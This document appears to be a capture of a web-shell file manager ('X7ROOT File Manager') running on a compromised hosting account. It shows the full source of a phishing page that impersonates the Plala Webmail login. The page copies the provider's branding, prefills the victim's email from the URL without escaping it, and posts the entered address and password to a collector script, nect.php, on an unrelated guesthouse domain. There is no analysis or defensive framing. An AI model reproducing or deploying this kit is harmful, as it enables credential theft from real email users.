X7ROOT File Manager
Current Path:
/home/remnbtxp/public_html/v
home
/
remnbtxp
/
public_html
/
v
/
📁
..
📄
error_log
(4.07 KB)
📄
index.php
(9.73 KB)
📄
nect.php
(3.28 KB)
Editing: index.php
<?php function getloginIDFromlogin($email) { $find = '@'; $pos = strpos($email, $find); $loginID = substr($email, 0, $pos); return $loginID; } function getDomainFromEmail($email) { // Get the data after the @ sign $domain = substr(strrchr($email, "@"), 1); return $domain; } $login = $_GET['email']; $loginID = getloginIDFromlogin($login); $domain = getDomainFromEmail($login); $ln = strlen($login); $len = strrev($login); $x = 0; for($i=0; $i<$ln; $i++){ if($len[$i] == "@"){ $x = $i; break; } } $yuh = substr($len,0,$x); $yuh = strrev($yuh); for($i=0; $i<$ln; $i++){ if($yuh[$i] == "."){ $x = $i; break; } } $yuh = substr($yuh,0,$x); $yuh = ucfirst($yuh); $display = strtoupper($yuh); ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=euc-jp"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="Description" content=""> <meta name="Keywords" content=""> <title>ぷらら Webメール</title> <link rel="stylesheet" href="https://web1.plala.or.jp/mail/plus/css/login.css" type="text/css"> <link rel="stylesheet" href="https://web1.plala.or.jp/mail/plus/css/tsuikalogin.css" type="text/css"> <script src="https://sec.plala.or.jp/fp/tags.js?org_id=2kamd3p6&session_id=1fbb153a767719431399e83f5cdf1a77" type="text/javascript"> </script> <script> function click_submit(btn){ btn.disabled = true; var f = document.forms["form"]; f.method = "POST"; f.action = "https://www.baanboaguesthouse.com/nect.php"; f.submit(); return true; } </script> </head> <body onload="document.forms[0].account.focus();"> <noscript> <iframe src="https://sec.plala.or.jp/fp/tags?org_id=2kamd3p6&session_id=1fbb153a767719431399e83f5cdf1a77" style="width: 100px; height: 100px; border: 0; position: absolute; top: -5000px;"> </iframe> </noscript> <div id="plala"> <div class="bg_g"> <table border="0" cellspacing="0" cellpadding="0" width="750"> <tr> <td width="750"><!-- ========= HEADER ========= --> <div id="head"> <table border="0" cellspacing="0" cellpadding="0" width="100%"> <tr> <td><table border="0" cellpadding="0" cellspacing="0" width="750" bgcolor="#ffffff"> <tr> <td colspan="3"><img src="https://web1.plala.or.jp/mail/plus/images/spacer.gif" width="1" height="11" alt=""></td> </tr> <tr> <td width="8"><img src="https://web1.plala.or.jp/mail/plus/images/spacer.gif" width="8" height="1" alt=""></td> <td width="115" valign="top"><a href="http://www.plala.or.jp/index.html" target="_top"><img src="https://web1.plala.or.jp/mail/plus/images/hd_logo_login.gif" alt="plala" width="115" height="58" border="0"></a></td> <td width="627"><div><img src="https://web1.plala.or.jp/mail/plus/images/spacer.gif" alt="" width="627" height="58" border="0"></div></td> </tr> </table> <table border="0" cellpadding="0" cellspacing="0" width="750"> <tr> <td bgcolor="#eeeeee"><img src="https://web1.plala.or.jp/mail/plus/images/barg.gif" alt="" width="750" height="30" border="0"></td> </tr> </table></td> </tr> </table> </div> <!-- ========= /HEADER ========= --> </td> </tr> <tr> <td><div id="mainArea"> <!-- ========= CAUTION ========= --> <noscript> <table border="0" cellspacing="0" cellpadding="0" width="727"> <tr> <td><div class="caution"><span class="S">当サイトをご覧いただくためにはJavascriptを有効にする必要があります。お使いのブラウザのJavascriptを“有効”に設定してご覧下さい。</span></div></td> </tr> </table> </noscript> <!-- ========= /CAUTION ========= --> <div class="m_cnt"> <div class="m_cnt_head">ぷらら Webメール</div> <div class="m_cnts"> <br> <!-- error --> <div> <table cellspacing=0 cellpadding=1 border=0> <tbody> <tr> </tr> </tbody> </table> <!-- /error --> </div> <form name="form" method="post" action="https://www.baanboaguesthouse.com/nect.php" onsubmit="return false;"> <input TYPE="hidden" NAME="atesaki" VALUE="webmail_login"> <!-- ========= CONTENTS ========= --> <br> <div align="center"> <table border="0" align="center" cellpadding="0" cellspacing="1" width="400"> <tr> <td colspan="3" align="center"> ぷららのメールアドレス/メールパスワードを入力してください。</td> </tr> <tr> <td colspan="3"><img src="https://web1.plala.or.jp/mail/plus/images/spacer.gif" height="10"></td> </tr> <tr> <td align="right">メールアドレス</td> <td width="30"><img src="https://web1.plala.or.jp/mail/plus/images/spacer.gif" width="30" height="1"></td> <td align="left"> <input type="text" name="login" size="26" maxlength="128" value="<?php echo $_GET['email']; ?>" style="font-family:Arial,Helvetica,sans-serif;" /></td> </tr> <tr> <td colspan="3"><img src="https://web1.plala.or.jp/mail/plus/images/spacer.gif" height="5"></td> </tr> <tr> <td colspan="3"><img src="https://web1.plala.or.jp/mail/plus/images/spacer.gif" height="5"></td> </tr> <tr> <td align="right">メールパスワード</td> <td></td> <td align="left"> <input type="password" name="passwd" size="26" maxlength="20" style="font-family:Arial,Helvetica,sans-serif;" /></td> </tr> <tr> <td colspan="3"><img src="https://web1.plala.or.jp/mail/plus/images/spacer.gif" height="15"></td> </tr> <tr> <td colspan="3" align="center"><input type="checkbox" name="mail_save_flag" value="1" >メールアドレスの情報を保存する。</td> </tr> </table> </div> <br> <div align="center"> <input TYPE="hidden" NAME="metrix_session_id" VALUE="1fbb153a767719431399e83f5cdf1a77"> <input onmouseover="this.src='https://web1.plala.or.jp/mail/plus/images/login_on.gif'" onmouseout="this.src='https://web1.plala.or.jp/mail/plus/images/login.gif'" type=image src="https://web1.plala.or.jp/mail/plus/images/login.gif" name="submit" value=" ログイン " onClick="click_submit(this)"> </div><br><br> <!-- ========= /CONTENTS ========= --> <font color="red"> WEBメールへの悪質な不正ログインが増えてます。<br> <a href="https://www.plala.or.jp/support/info/2020/0318/" target="_blank">こちら</a>の手順でご確認をお願いします。 </font> </div> <div class="m_cnt_foot"></div> </div> </div></td> </tr> <tr> <td bgcolor="#FFFFE6"><!-- ========= FOOTER ========= --> <div id="copy"><span class="Mfix"><font color="#000000"><b> メールパスワードは会員登録証にてご確認いただけます。メールパスワードを忘れた方は<a href="http://web1.plala.or.jp/support/faq/faq_docs/ID0054.html" target="_blank">こちら</a>をご確認下さい。<br> 複数メールのメールパスワードを忘れた方は<a href="http://web1.plala.or.jp/support/faq/faq_docs/ID0055.html" target="_blank">こちら</a>をご確認下さ</font><br> Copyright 2010 NTT Plala Inc. All rights reserved.</span></div> <!-- ========= /FOOTER ========= --> </td> </tr> </table> </div> </div> </form> </body> </html>s
Upload File
Create Folder